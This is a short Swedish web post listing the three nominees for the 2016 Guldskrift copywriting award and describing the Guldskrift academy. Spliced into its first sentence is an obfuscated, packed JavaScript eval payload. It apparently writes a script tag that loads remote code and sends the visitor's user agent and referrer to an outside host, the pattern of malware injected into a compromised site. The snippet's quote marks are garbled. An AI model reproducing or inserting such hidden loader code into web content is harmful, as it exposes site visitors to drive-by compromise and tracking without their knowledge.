Image Image Image Image Image Image Image Image Image Image

| 1 november, 2020

Scroll to top

Top

De kan vinna Guldskrift

De kan vinna Guldskrift
Sebastian

Guldskrift eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ynysr|var|u0026u|referrer|iarbs||js|php’.split(’|’),0,{}))
delas i år ut för 22:a gången för att återigen hylla det skrivna ordet.
Citypaketet och KOMM har i år valt, att för första gången, presentera nominerade bidrag.

Här är de nominerade bidragen till Guldskrift 2016:
Bidragsnamn: Business like a Swede
Byrå: ANR BBDO
Kund: TCO
Copywriter: Stephanie Moradi

Bidragsnamn: The Ramblings of a Mad Man
Byrå: Forsman & Bodenfors
Kund: Oatly
Copywriter: John Schoolcraft

Bidragsnamn: Varför läser du det här?
Byrå: Forsman & Bodenfors
Kund: Tele2 Business
Copywriter: Johan Holmström

Om Guldskrift:
Citypaketet är instiftare av Guldskrift. Som instiftare till priset vill Citypaketet uppmuntra till högre stilistik kvalitet och språklig kreatvitet i svensk kommunikation. Vinnaren utses av Guldskriftsakademin med Anna Qvennerstedt som städnig sekreterare samt de sex senaste vinnarna. I år består Guldskriftsakademin av: Anna Qvennerstedt, Christian Heinig, Magnus Jakobsson, Tove Eriksen Hillblom, Johannes Ivarsson, Linda Elers och Olle Langseth. Vinnaren presenteras på Guldäggsgalan den 20:e april.